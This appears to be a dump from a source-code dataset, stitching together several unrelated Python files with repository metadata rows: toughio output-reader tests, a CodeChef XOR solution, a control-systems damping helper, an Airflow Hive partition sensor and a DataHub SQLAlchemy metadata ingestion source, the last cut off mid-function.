this_dir = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(this_dir, "support_files", "outputs", filename)
outputs = toughio.read_output(filename)
filename = os.path.join(this_dir, "support_files", "outputs", filename_ref)
save = toughio.read_output(filename)
assert len(outputs) == 5
times_ref = [
0.2592000e08,
0.3155800e08,
0.1577900e09,
0.3155800e09,
0.7889400e09,
]
keys_ref = ["POR", "PRES", "SAT_G", "TEMP", "X", "Y", "Z"]
for output, time_ref in zip(outputs, times_ref):
assert time_ref == output.time
assert (
save.labels.tolist() == output.labels.tolist()
if output.format in {"csv", "petrasim", "tough"}
else output.labels == None
)
if output.format != "tough":
assert keys_ref == sorted(list(output.data.keys()))
assert numpy.allclose(save.data["X1"], outputs[-1].data["PRES"])
assert numpy.allclose(save.data["X2"], outputs[-1].data["TEMP"], atol=0.1)
@pytest.mark.parametrize(
"filename",
["OUTPUT_CONNE.csv", "OUTPUT.out", "OUTPUT_6.out"],
)
def test_output_conne(filename):
this_dir = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(this_dir, "support_files", "outputs", filename)
outputs = toughio.read_output(filename, connection=True)
times_ref = [
0.2592000e08,
0.3155800e08,
0.1577900e09,
0.3155800e09,
0.7889400e09,
]
data_ref = [
52542.0,
52475.0,
51146.0,
49600.0,
45623.0,
]
for output, time_ref, data in zip(outputs, times_ref, data_ref):
assert time_ref == output.time
assert (
len(set("".join(labels) for labels in output.labels))
== output.data["HEAT"].size
)
assert numpy.allclose(data, numpy.abs(output.data["HEAT"]).mean(), atol=1.0)
@pytest.mark.parametrize(
"output_ref, file_format",
[
(helpers.output_eleme, "csv"),
(helpers.output_eleme[0], "csv"),
(helpers.output_eleme, "petrasim"),
(helpers.output_eleme[0], "petrasim"),
(helpers.output_eleme, "tecplot"),
(helpers.output_eleme[0], "tecplot"),
(helpers.output_conne, "csv"),
(helpers.output_conne[0], "csv"),
],
)
def test_output(output_ref, file_format):
output = write_read(
output=output_ref,
writer_kws={"file_format": file_format},
reader_kws={},
)
output_ref = output_ref if isinstance(output_ref, list) else [output_ref]
for out_ref, out in zip(output_ref, output):
helpers.allclose_output(out_ref, out)
def test_save():
this_dir = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(this_dir, "support_files", "outputs", "SAVE.out")
save = toughio.read_output(filename)
x_ref = [6.35804123e05, 1.42894499e02, 9.91868799e-01]
assert numpy.allclose(
x_ref, numpy.mean([save.data["X1"], save.data["X2"], save.data["X3"]], axis=1)
)
assert numpy.allclose(0.01, save.data["porosity"].mean())
assert "userx" not in save.data.keys()
| true
| true
|
f70501b6041b222ae4cdc6349c3646848546cf5f
| 271
|
py
|
Python
|
CodeChef_problems/XORAGN/solution.py
|
gbrls/CompetitiveCode
|
b6f1b817a655635c3c843d40bd05793406fea9c6
|
[
"MIT"
] | 165
|
2020-10-03T08:01:11.000Z
|
2022-03-31T02:42:08.000Z
|
CodeChef_problems/XORAGN/solution.py
|
gbrls/CompetitiveCode
|
b6f1b817a655635c3c843d40bd05793406fea9c6
|
[
"MIT"
] | 383
|
2020-10-03T07:39:11.000Z
|
2021-11-20T07:06:35.000Z
|
CodeChef_problems/XORAGN/solution.py
|
gbrls/CompetitiveCode
|
b6f1b817a655635c3c843d40bd05793406fea9c6
|
[
"MIT"
] | 380
|
2020-10-03T08:05:04.000Z
|
2022-03-19T06:56:59.000Z
|
#Question Link
#https://www.codechef.com/problems/XORAGN
t=int(input())
for a0 in range(t):
n=int(input())
a=list(map(int,input().split()))
res=0
for i in a:
res=res^i #xorring all the values present
print(2*res) #doubling the result obtained
| 24.636364
| 49
| 0.645756
|
t=int(input())
for a0 in range(t):
n=int(input())
a=list(map(int,input().split()))
res=0
for i in a:
res=res^i
print(2*res)
| true
| true
|
f705031b38df3c5a63196a68e3910cb0f10187d4
| 716
|
py
|
Python
|
control_plotly/utils.py
|
vincentchoqueuse/python-control-plotly
|
5f4f7d354d4de2628ea52a5e544ebeb138d106bc
|
[
"MIT"
] | 3
|
2021-08-17T19:21:22.000Z
|
2021-08-23T17:58:52.000Z
|
control_plotly/utils.py
|
vincentchoqueuse/python-control-plotly
|
5f4f7d354d4de2628ea52a5e544ebeb138d106bc
|
[
"MIT"
] | null | null | null |
control_plotly/utils.py
|
vincentchoqueuse/python-control-plotly
|
5f4f7d354d4de2628ea52a5e544ebeb138d106bc
|
[
"MIT"
] | null | null | null |
import control as ctl
import numpy as np
def damp(sys,display=False):
pole_list = []
m_list = []
wn_list = []
for pole in sys.pole():
pole = pole.astype(complex) # WTF: the python control "damp" function is buggy due to this missing cast !
if ctl.isctime(sys):
pole_continuous = pole
else:
pole_continuous = np.log(pole)/sys.dt
wn = np.abs(pole_continuous)
m = -np.real(pole_continuous)/wn
pole_list.append(pole)
wn_list.append(wn)
m_list.append(m)
if display:
print("pole {:.3f} : wn={:.3f} rad/s, m= {:.3f}".format(pole, wn, m))
return wn_list, m_list, pole_list
| 24.689655
| 113
| 0.564246
|
import control as ctl
import numpy as np
def damp(sys,display=False):
pole_list = []
m_list = []
wn_list = []
for pole in sys.pole():
pole = pole.astype(complex)
if ctl.isctime(sys):
pole_continuous = pole
else:
pole_continuous = np.log(pole)/sys.dt
wn = np.abs(pole_continuous)
m = -np.real(pole_continuous)/wn
pole_list.append(pole)
wn_list.append(wn)
m_list.append(m)
if display:
print("pole {:.3f} : wn={:.3f} rad/s, m= {:.3f}".format(pole, wn, m))
return wn_list, m_list, pole_list
| true
| true
|
f705039b1f57c4a0a916cbfd3c1650721de1f279
| 3,014
|
py
|
Python
|
airflow/providers/apache/hive/sensors/hive_partition.py
|
Hartorn/airflow
|
a79e2d4c4aa105f3fac5ae6a28e29af9cd572407
|
[
"Apache-2.0"
] | 3
|
2015-08-25T13:56:44.000Z
|
2020-03-21T10:26:58.000Z
|
airflow/providers/apache/hive/sensors/hive_partition.py
|
Hartorn/airflow
|
a79e2d4c4aa105f3fac5ae6a28e29af9cd572407
|
[
"Apache-2.0"
] | 37
|
2020-07-21T07:50:02.000Z
|
2022-03-29T22:31:28.000Z
|
airflow/providers/apache/hive/sensors/hive_partition.py
|
vuppalli/airflow
|
dfe8337ca2d3ed173d9ecc112938271519792c40
|
[
"Apache-2.0"
] | 2
|
2018-07-24T08:54:45.000Z
|
2018-08-31T13:41:50.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.providers.apache.hive.hooks.hive import HiveMetastoreHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class HivePartitionSensor(BaseSensorOperator):
"""
Waits for a partition to show up in Hive.
Note: Because ``partition`` supports general logical operators, it
can be inefficient. Consider using NamedHivePartitionSensor instead if
you don't need the full flexibility of HivePartitionSensor.
:param table: The name of the table to wait for, supports the dot
notation (my_database.my_table)
:type table: str
:param partition: The partition clause to wait for. This is passed as
is to the metastore Thrift client ``get_partitions_by_filter`` method,
and apparently supports SQL like notation as in ``ds='2015-01-01'
AND type='value'`` and comparison operators as in ``"ds>=2015-01-01"``
:type partition: str
:param metastore_conn_id: reference to the metastore thrift service
connection id
:type metastore_conn_id: str
"""
template_fields = ('schema', 'table', 'partition',)
ui_color = '#C5CAE9'
@apply_defaults
def __init__(self,
table, partition="ds='{{ ds }}'",
metastore_conn_id='metastore_default',
schema='default',
poke_interval=60 * 3,
*args,
**kwargs):
super().__init__(
poke_interval=poke_interval, *args, **kwargs)
if not partition:
partition = "ds='{{ ds }}'"
self.metastore_conn_id = metastore_conn_id
self.table = table
self.partition = partition
self.schema = schema
def poke(self, context):
if '.' in self.table:
self.schema, self.table = self.table.split('.')
self.log.info(
'Poking for table %s.%s, partition %s', self.schema, self.table, self.partition
)
if not hasattr(self, 'hook'):
hook = HiveMetastoreHook(
metastore_conn_id=self.metastore_conn_id)
return hook.check_for_partition(
self.schema, self.table, self.partition)
| 40.186667
| 91
| 0.674851
|
from airflow.providers.apache.hive.hooks.hive import HiveMetastoreHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class HivePartitionSensor(BaseSensorOperator):
template_fields = ('schema', 'table', 'partition',)
ui_color = '#C5CAE9'
@apply_defaults
def __init__(self,
table, partition="ds='{{ ds }}'",
metastore_conn_id='metastore_default',
schema='default',
poke_interval=60 * 3,
*args,
**kwargs):
super().__init__(
poke_interval=poke_interval, *args, **kwargs)
if not partition:
partition = "ds='{{ ds }}'"
self.metastore_conn_id = metastore_conn_id
self.table = table
self.partition = partition
self.schema = schema
def poke(self, context):
if '.' in self.table:
self.schema, self.table = self.table.split('.')
self.log.info(
'Poking for table %s.%s, partition %s', self.schema, self.table, self.partition
)
if not hasattr(self, 'hook'):
hook = HiveMetastoreHook(
metastore_conn_id=self.metastore_conn_id)
return hook.check_for_partition(
self.schema, self.table, self.partition)
| true
| true
|
f7050439ef98c033793027024ec1d306c91c767c
| 15,018
|
py
|
Python
|
metadata-ingestion/src/datahub/ingestion/source/sql_common.py
|
hmjahle/datahub_upstream
|
62d5306a28e0df6b6b67a5f46c01dd508caada60
|
[
"Apache-2.0"
] | null | null | null |
metadata-ingestion/src/datahub/ingestion/source/sql_common.py
|
hmjahle/datahub_upstream
|
62d5306a28e0df6b6b67a5f46c01dd508caada60
|
[
"Apache-2.0"
] | null | null | null |
metadata-ingestion/src/datahub/ingestion/source/sql_common.py
|
hmjahle/datahub_upstream
|
62d5306a28e0df6b6b67a5f46c01dd508caada60
|
[
"Apache-2.0"
] | null | null | null |
import logging
from abc import abstractmethod
from dataclasses import dataclass, field
from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Type
from urllib.parse import quote_plus
import pydantic
from sqlalchemy import create_engine, inspect
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.sql import sqltypes as types
from datahub.configuration.common import AllowDenyPattern, ConfigModel
from datahub.emitter.mce_builder import DEFAULT_ENV
from datahub.ingestion.api.common import PipelineContext
from datahub.ingestion.api.source import Source, SourceReport
from datahub.ingestion.api.workunit import MetadataWorkUnit
from datahub.metadata.com.linkedin.pegasus2avro.metadata.snapshot import DatasetSnapshot
from datahub.metadata.com.linkedin.pegasus2avro.mxe import MetadataChangeEvent
from datahub.metadata.com.linkedin.pegasus2avro.schema import (
ArrayTypeClass,
BooleanTypeClass,
BytesTypeClass,
DateTypeClass,
EnumTypeClass,
MySqlDDL,
NullTypeClass,
NumberTypeClass,
RecordTypeClass,
SchemaField,
SchemaFieldDataType,
SchemaMetadata,
StringTypeClass,
TimeTypeClass,
)
from datahub.metadata.schema_classes import DatasetPropertiesClass
logger: logging.Logger = logging.getLogger(__name__)
def make_sqlalchemy_uri(
scheme: str,
username: Optional[str],
password: Optional[str],
at: Optional[str],
db: Optional[str],
uri_opts: Optional[Dict[str, Any]] = None,
) -> str:
url = f"{scheme}://"
if username is not None:
url += f"{quote_plus(username)}"
if password is not None:
url += f":{quote_plus(password)}"
url += "@"
if at is not None:
url += f"{at}"
if db is not None:
url += f"/{db}"
if uri_opts is not None:
if db is None:
url += "/"
params = "&".join(
f"{key}={quote_plus(value)}" for (key, value) in uri_opts.items() if value
)
url = f"{url}?{params}"
return url
@dataclass
class SQLSourceReport(SourceReport):
tables_scanned: int = 0
views_scanned: int = 0
filtered: List[str] = field(default_factory=list)
def report_entity_scanned(self, name: str, ent_type: str = "table") -> None:
"""
Entity could be a view or a table
"""
if ent_type == "table":
self.tables_scanned += 1
elif ent_type == "view":
self.views_scanned += 1
else:
raise KeyError(f"Unknown entity {ent_type}.")
def report_dropped(self, ent_name: str) -> None:
self.filtered.append(ent_name)
class SQLAlchemyConfig(ConfigModel):
env: str = DEFAULT_ENV
options: dict = {}
# Although the 'table_pattern' enables you to skip everything from certain schemas,
# having another option to allow/deny on schema level is an optimization for the case when there is a large number
# of schemas that one wants to skip and you want to avoid the time to needlessly fetch those tables only to filter
# them out afterwards via the table_pattern.
schema_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
table_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
view_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
include_views: Optional[bool] = True
include_tables: Optional[bool] = True
@abstractmethod
def get_sql_alchemy_url(self):
pass
def get_identifier(self, schema: str, table: str) -> str:
return f"{schema}.{table}"
def standardize_schema_table_names(
self, schema: str, entity: str
) -> Tuple[str, str]:
# Some SQLAlchemy dialects need a standardization step to clean the schema
# and table names. See BigQuery for an example of when this is useful.
return schema, entity
class BasicSQLAlchemyConfig(SQLAlchemyConfig):
username: Optional[str] = None
password: Optional[pydantic.SecretStr] = None
host_port: str
database: Optional[str] = None
database_alias: Optional[str] = None
scheme: str
def get_sql_alchemy_url(self, uri_opts=None):
return make_sqlalchemy_uri(
self.scheme,
self.username,
self.password.get_secret_value() if self.password else None,
self.host_port,
self.database,
uri_opts=uri_opts,
)
@dataclass
class SqlWorkUnit(MetadataWorkUnit):
pass
_field_type_mapping: Dict[Type[types.TypeEngine], Type] = {
types.Integer: NumberTypeClass,
types.Numeric: NumberTypeClass,
types.Boolean: BooleanTypeClass,
types.Enum: EnumTypeClass,
types._Binary: BytesTypeClass,
types.LargeBinary: BytesTypeClass,
types.PickleType: BytesTypeClass,
types.ARRAY: ArrayTypeClass,
types.String: StringTypeClass,
types.Date: DateTypeClass,
types.DATE: DateTypeClass,
types.Time: TimeTypeClass,
types.DateTime: TimeTypeClass,
types.DATETIME: TimeTypeClass,
types.TIMESTAMP: TimeTypeClass,
types.JSON: RecordTypeClass,
# When SQLAlchemy is unable to map a type into its internally hierarchy, it
# assigns the NullType by default. We want to carry this warning through.
types.NullType: NullTypeClass,
}
_known_unknown_field_types: Set[Type[types.TypeEngine]] = {
types.Interval,
types.CLOB,
}
def register_custom_type(
tp: Type[types.TypeEngine], output: Optional[Type] = None
) -> None:
if output:
_field_type_mapping[tp] = output
else:
_known_unknown_field_types.add(tp)
class _CustomSQLAlchemyDummyType(types.TypeDecorator):
impl = types.LargeBinary
def make_sqlalchemy_type(name: str) -> Type[types.TypeEngine]:
# This usage of type() dynamically constructs a class.
# See https://stackoverflow.com/a/15247202/5004662 and
# https://docs.python.org/3/library/functions.html#type.
sqlalchemy_type: Type[types.TypeEngine] = type(
name,
(_CustomSQLAlchemyDummyType,),
{
"__repr__": lambda self: f"{name}()",
},
)
return sqlalchemy_type
def get_column_type(
sql_report: SQLSourceReport, dataset_name: str, column_type: Any
) -> SchemaFieldDataType:
"""
Maps SQLAlchemy types (https://docs.sqlalchemy.org/en/13/core/type_basics.html) to corresponding schema types
"""
TypeClass: Optional[Type] = None
for sql_type in _field_type_mapping.keys():
if isinstance(column_type, sql_type):
TypeClass = _field_type_mapping[sql_type]
break
if TypeClass is None:
for sql_type in _known_unknown_field_types:
if isinstance(column_type, sql_type):
TypeClass = NullTypeClass
break
if TypeClass is None:
sql_report.report_warning(
dataset_name, f"unable to map type {column_type!r} to metadata schema"
)
TypeClass = NullTypeClass
return SchemaFieldDataType(type=TypeClass())
def get_schema_metadata(
sql_report: SQLSourceReport, dataset_name: str, platform: str, columns: List[dict]
) -> SchemaMetadata:
canonical_schema: List[SchemaField] = []
for column in columns:
field = SchemaField(
fieldPath=column["name"],
type=get_column_type(sql_report, dataset_name, column["type"]),
nativeDataType=column.get("full_type", repr(column["type"])),
description=column.get("comment", None),
nullable=column["nullable"],
recursive=False,
)
canonical_schema.append(field)
schema_metadata = SchemaMetadata(
schemaName=dataset_name,
platform=f"urn:li:dataPlatform:{platform}",
version=0,
hash="",
platformSchema=MySqlDDL(tableSchema=""),
fields=canonical_schema,
)
return schema_metadata
class SQLAlchemySource(Source):
"""A Base class for all SQL Sources that use SQLAlchemy to extend"""
def __init__(self, config: SQLAlchemyConfig, ctx: PipelineContext, platform: str):
super().__init__(ctx)
self.config = config
self.platform = platform
self.report = SQLSourceReport()
def get_inspectors(self) -> Iterable[Inspector]:
# This method can be overridden in the case that you want to dynamically
# run on multiple databases.
url = self.config.get_sql_alchemy_url()
logger.debug(f"sql_alchemy_url={url}")
engine = create_engine(url, **self.config.options)
inspector = inspect(engine)
yield inspector
def get_workunits(self) -> Iterable[SqlWorkUnit]:
sql_config = self.config
if logger.isEnabledFor(logging.DEBUG):
# If debug logging is enabled, we also want to echo each SQL query issued.
sql_config.options["echo"] = True
for inspector in self.get_inspectors():
for schema in inspector.get_schema_names():
if not sql_config.schema_pattern.allowed(schema):
self.report.report_dropped(f"{schema}.*")
continue
if sql_config.include_tables:
yield from self.loop_tables(inspector, schema, sql_config)
if sql_config.include_views:
yield from self.loop_views(inspector, schema, sql_config)
def loop_tables(
self,
inspector: Inspector,
schema: str,
sql_config: SQLAlchemyConfig,
) -> Iterable[SqlWorkUnit]:
for table in inspector.get_table_names(schema):
schema, table = sql_config.standardize_schema_table_names(schema, table)
dataset_name = sql_config.get_identifier(schema, table)
self.report.report_entity_scanned(dataset_name, ent_type="table")
if not sql_config.table_pattern.allowed(dataset_name):
self.report.report_dropped(dataset_name)
continue
columns = inspector.get_columns(table, schema)
if len(columns) == 0:
self.report.report_warning(dataset_name, "missing column information")
try:
# SQLALchemy stubs are incomplete and missing this method.
# PR: https://github.com/dropbox/sqlalchemy-stubs/pull/223.
table_info: dict = inspector.get_table_comment(table, schema) # type: ignore
except NotImplementedError:
description: Optional[str] = None
properties: Dict[str, str] = {}
else:
description = table_info["text"]
# The "properties" field is a non-standard addition to SQLAlchemy's interface.
properties = table_info.get("properties", {})
# TODO: capture inspector.get_pk_constraint
# TODO: capture inspector.get_sorted_table_and_fkc_names
dataset_snapshot = DatasetSnapshot(
urn=f"urn:li:dataset:(urn:li:dataPlatform:{self.platform},{dataset_name},{self.config.env})",
aspects=[],
)
if description is not None or properties:
dataset_properties = DatasetPropertiesClass(
description=description,
customProperties=properties,
)
dataset_snapshot.aspects.append(dataset_properties)
schema_metadata = get_schema_metadata(
self.report, dataset_name, self.platform, columns
)
dataset_snapshot.aspects.append(schema_metadata)
mce = MetadataChangeEvent(proposedSnapshot=dataset_snapshot)
wu = SqlWorkUnit(id=dataset_name, mce=mce)
self.report.report_workunit(wu)
yield wu
def loop_views(
self,
inspector: Inspector,
schema: str,
sql_config: SQLAlchemyConfig,
) -> Iterable[SqlWorkUnit]:
for view in inspector.get_view_names(schema):
schema, view = sql_config.standardize_schema_table_names(schema, view)
dataset_name = sql_config.get_identifier(schema, view)
self.report.report_entity_scanned(dataset_name, ent_type="view")
if not sql_config.view_pattern.allowed(dataset_name):
self.report.report_dropped(dataset_name)
continue
try:
columns = inspector.get_columns(view, schema)
except KeyError:
# For certain types of views, we are unable to fetch the list of columns.
self.report.report_warning(
dataset_name, "unable to get schema for this view"
)
schema_metadata = None
else:
schema_metadata = get_schema_metadata(
self.report, dataset_name, self.platform, columns
)
try:
# SQLALchemy stubs are incomplete and missing this method.
# PR: https://github.com/dropbox/sqlalchemy-stubs/pull/223.
view_info: dict = inspector.get_table_comment(view, schema) # type: ignore
except NotImplementedError:
description: Optional[str] = None
properties: Dict[str, str] = {}
else:
description = view_info["text"]
# The "properties" field is a non-standard addition to SQLAlchemy's interface.
properties = view_info.get("properties", {})
try:
view_definition = inspector.get_view_definition(view, schema)
if view_definition is None:
view_definition = ""
else:
# Some dialects return a TextClause instead of a raw string,
# so we need to convert them to a string.
view_definition = str(view_definition)
except NotImplementedError:
view_definition = ""
properties["view_definition"] = view_definition
properties["is_view"] = "True"
dataset_snapshot = DatasetSnapshot(
urn=f"urn:li:dataset:(urn:li:dataPlatform:{self.platform},{dataset_name},{self.config.env})",
aspects=[],
)
if description is not None or properties:
dataset_properties = DatasetPropertiesClass(
description=description,
customProperties=properties,
# uri=dataset_name,
)
dataset_snapshot.aspects.append(dataset_properties)
if schema_metadata:
dataset_snapshot.aspects.append(schema_metadata)
mce = MetadataChangeEvent(proposedSnapshot=dataset_snapshot)
wu = SqlWorkUnit(id=dataset_name, mce=mce)
self.report.report_workunit(wu)
yield wu
def get_report(self):
return self.report
def close(self):
pass
| 35.757143
| 118
| 0.639433
|
import logging
from abc import abstractmethod
from dataclasses import dataclass, field
from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Type
from urllib.parse import quote_plus
import pydantic
from sqlalchemy import create_engine, inspect
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.sql import sqltypes as types
from datahub.configuration.common import AllowDenyPattern, ConfigModel
from datahub.emitter.mce_builder import DEFAULT_ENV
from datahub.ingestion.api.common import PipelineContext
from datahub.ingestion.api.source import Source, SourceReport
from datahub.ingestion.api.workunit import MetadataWorkUnit
from datahub.metadata.com.linkedin.pegasus2avro.metadata.snapshot import DatasetSnapshot
from datahub.metadata.com.linkedin.pegasus2avro.mxe import MetadataChangeEvent
from datahub.metadata.com.linkedin.pegasus2avro.schema import (
ArrayTypeClass,
BooleanTypeClass,
BytesTypeClass,
DateTypeClass,
EnumTypeClass,
MySqlDDL,
NullTypeClass,
NumberTypeClass,
RecordTypeClass,
SchemaField,
SchemaFieldDataType,
SchemaMetadata,
StringTypeClass,
TimeTypeClass,
)
from datahub.metadata.schema_classes import DatasetPropertiesClass
logger: logging.Logger = logging.getLogger(__name__)
def make_sqlalchemy_uri(
scheme: str,
username: Optional[str],
password: Optional[str],
at: Optional[str],
db: Optional[str],
uri_opts: Optional[Dict[str, Any]] = None,
) -> str:
url = f"{scheme}://"
if username is not None:
url += f"{quote_plus(username)}"
if password is not None:
url += f":{quote_plus(password)}"
url += "@"
if at is not None:
url += f"{at}"
if db is not None:
url += f"/{db}"
if uri_opts is not None:
if db is None:
url += "/"
params = "&".join(
f"{key}={quote_plus(value)}" for (key, value) in uri_opts.items() if value
)
url = f"{url}?{params}"
return url
@dataclass
class SQLSourceReport(SourceReport):
tables_scanned: int = 0
views_scanned: int = 0
filtered: List[str] = field(default_factory=list)
def report_entity_scanned(self, name: str, ent_type: str = "table") -> None:
if ent_type == "table":
self.tables_scanned += 1
elif ent_type == "view":
self.views_scanned += 1
else:
raise KeyError(f"Unknown entity {ent_type}.")
def report_dropped(self, ent_name: str) -> None:
self.filtered.append(ent_name)
class SQLAlchemyConfig(ConfigModel):
env: str = DEFAULT_ENV
options: dict = {}
schema_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
table_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
view_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
include_views: Optional[bool] = True
include_tables: Optional[bool] = True
@abstractmethod
def get_sql_alchemy_url(self):
pass
def get_identifier(self, schema: str, table: str) -> str:
return f"{schema}.{table}"
def standardize_schema_table_names(
self, schema: str, entity: str
) -> Tuple[str, str]:
return schema, entity
class BasicSQLAlchemyConfig(SQLAlchemyConfig):
username: Optional[str] = None
password: Optional[pydantic.SecretStr] = None
host_port: str
database: Optional[str] = None
database_alias: Optional[str] = None
scheme: str
def get_sql_alchemy_url(self, uri_opts=None):
return make_sqlalchemy_uri(
self.scheme,
self.username,
self.password.get_secret_value() if self.password else None,
self.host_port,
self.database,
uri_opts=uri_opts,
)
@dataclass
class SqlWorkUnit(MetadataWorkUnit):
pass
_field_type_mapping: Dict[Type[types.TypeEngine], Type] = {
types.Integer: NumberTypeClass,
types.Numeric: NumberTypeClass,
types.Boolean: BooleanTypeClass,
types.Enum: EnumTypeClass,
types._Binary: BytesTypeClass,
types.LargeBinary: BytesTypeClass,
types.PickleType: BytesTypeClass,
types.ARRAY: ArrayTypeClass,
types.String: StringTypeClass,
types.Date: DateTypeClass,
types.DATE: DateTypeClass,
types.Time: TimeTypeClass,
types.DateTime: TimeTypeClass,
types.DATETIME: TimeTypeClass,
types.TIMESTAMP: TimeTypeClass,
types.JSON: RecordTypeClass,
types.NullType: NullTypeClass,
}
_known_unknown_field_types: Set[Type[types.TypeEngine]] = {
types.Interval,
types.CLOB,
}
def register_custom_type(
tp: Type[types.TypeEngine], output: Optional[Type] = None
) -> None:
if output:
_field_type_mapping[tp] = output
else:
_known_unknown_field_types.add(tp)
class _CustomSQLAlchemyDummyType(types.TypeDecorator):
impl = types.LargeBinary
def make_sqlalchemy_type(name: str) -> Type[types.TypeEngine]:
qlalchemy_type: Type[types.TypeEngine] = type(
name,
(_CustomSQLAlchemyDummyType,),
{
"__repr__": lambda self: f"{name}()",
},
)
return sqlalchemy_type
def get_column_type(
sql_report: SQLSourceReport, dataset_name: str, column_type: Any
) -> SchemaFieldDataType:
TypeClass: Optional[Type] = None
for sql_type in _field_type_mapping.keys():
if isinstance(column_type, sql_type):
TypeClass = _field_type_mapping[sql_type]
break
if TypeClass is None:
for sql_type in _known_unknown_field_types:
if isinstance(column_type, sql_type):
TypeClass = NullTypeClass
break
if TypeClass is None:
sql_report.report_warning(
dataset_name, f"unable to map type {column_type!r} to metadata schema"
)
TypeClass = NullTypeClass
return SchemaFieldDataType(type=TypeClass())
def get_schema_metadata(
sql_report: SQLSourceReport, dataset_name: str, platform: str, columns: List[dict]
) -> SchemaMetadata:
canonical_schema: List[SchemaField] = []
for column in columns:
field = SchemaField(
fieldPath=column["name"],
type=get_column_type(sql_report, dataset_name, column["type"]),
nativeDataType=column.get("full_type", repr(column["type"])),
description=column.get("comment", None),
nullable=column["nullable"],
recursive=False,
)
canonical_schema.append(field)
schema_metadata = SchemaMetadata(
schemaName=dataset_name,
platform=f"urn:li:dataPlatform:{platform}",
version=0,
hash="",
platformSchema=MySqlDDL(tableSchema=""),
fields=canonical_schema,
)
return schema_metadata
class SQLAlchemySource(Source):
def __init__(self, config: SQLAlchemyConfig, ctx: PipelineContext, platform: str):
super().__init__(ctx)
self.config = config
self.platform = platform
self.report = SQLSourceReport()
def get_inspectors(self) -> Iterable[Inspector]:
url = self.config.get_sql_alchemy_url()
logger.debug(f"sql_alchemy_url={url}")
engine = create_engine(url, **self.config.options)
inspector = inspect(engine)
yield inspector
def get_workunits(self) -> Iterable[SqlWorkUnit]:
sql_config = self.config
if logger.isEnabledFor(logging.DEBUG):
sql_config.options["echo"] = True
for inspector in self.get_inspectors():
for schema in inspector.get_schema_names():
if not sql_config.schema_pattern.allowed(schema):
self.report.report_dropped(f"{schema}.*")
continue
if sql_config.include_tables:
yield from self.loop_tables(inspector, schema, sql_config)
if sql_config.include_views:
yield from self.loop_views(inspector, schema, sql_config)
def loop_tables(
self,
inspector: Inspector,
schema: str,
sql_config: SQLAlchemyConfig,
) -> Iterable[SqlWorkUnit]:
for table in inspector.get_table_names(schema):
schema, table = sql_config.standardize_schema_table_names(schema, table)
dataset_name = sql_config.get_identifier(schema, table)
self.report.report_entity_scanned(dataset_name, ent_type="table")
if not sql_config.table_pattern.allowed(dataset_name):
self.report.report_dropped(dataset_name)
continue
columns = inspector.get_columns(table, schema)
if len(columns) == 0:
self.report.report_warning(dataset_name, "missing column information")
try:
table_info: dict = inspector.get_table_comment(table, schema)
except NotImplementedError:
description: Optional[str] = None
properties: Dict[str, str] = {}
else:
description = table_info["text"]
properties = table_info.get("properties", {})
# TODO: capture inspector.get_pk_constraint
# TODO: capture inspector.get_sorted_table_and_fkc_names
dataset_snapshot = DatasetSnapshot(
urn=f"urn:li:dataset:(urn:li:dataPlatform:{self.platform},{dataset_name},{self.config.env})",
aspects=[],
)
if description is not None or properties:
dataset_properties = DatasetPropertiesClass(
description=description,
customProperties=properties,
)
dataset_snapshot.aspects.append(dataset_properties)
schema_metadata = get_schema_metadata(
self.report, dataset_name, self.platform, columns
)
dataset_snapshot.aspects.append(schema_metadata)
mce = MetadataChangeEvent(proposedSnapshot=dataset_snapshot)
wu = SqlWorkUnit(id=dataset_name, mce=mce)
self.report.report_workunit(wu)
yield wu
def loop_views(
self,
inspector: Inspector,
schema: str,
sql_config: SQLAlchemyConfig,
) -> Iterable[SqlWorkUnit]:
for view in inspector.get_view_names(schema):
schema, view = sql_config.standardize_schema_table_names(schema, view)
dataset_name = sql_config.get_identifier(schema, view)
self.report.report_entity_scanned(dataset_name, ent_type="view")
if not sql_config.view_pattern.allowed(dataset_name):
self.report.report_dropped(dataset_name)
continue
try:
columns = inspector.get_columns(view, schema)
except KeyError:
# For certain types of views, we are unable to fetch the list of columns.
self.report.report_warning(
dataset_name, "unable to get schema for this view"
)
schema_metadata = None
else:
schema_metadata = get_schema_metadata(
self.report, dataset_name, self.platform, columns
)
try:
# SQLALchemy stubs are incomplete and missing this method.
# PR: https://github.com/dropbox/sqlalchemy-stubs/pull/223.
view_info: dict = inspector.get_table_comment(view, schema) # type: ignore
except NotImplementedError:
description: Optional[str] = None
properties: Dict[str, str] = {}
else:
description = view_info["text"]
# The "properties" field is a non-standard addition to SQLAlchemy's interface.
properties = view_info.get("properties", {})
try:
view_definition = inspector.get_view_definition(view, schema)
if view_definition is None:
view_definition = ""
else:
view_definition = str(view_definition)
except NotImplementedError:
view_definition = ""
properties["view_definition"] = view_definition
properties["is_view"] = "True"
dataset_snapshot = DatasetSnapshot(
urn=f"urn:li:dataset:(urn:li:dataPlatform:{self.platform},{dataset_name},{self.config.env})",
aspects=[],
)
if description is not None or properties:
dataset_properties = DatasetPropertiesClass(
description=description,
customProperties=properties,
)
dataset_snapshot.aspects.append(dataset_properties)
if schema_metadata:
dataset_snapshot.aspects.append(schema_metadata)
mce = MetadataChangeEvent(proposedSnapshot=dataset_snapshot)
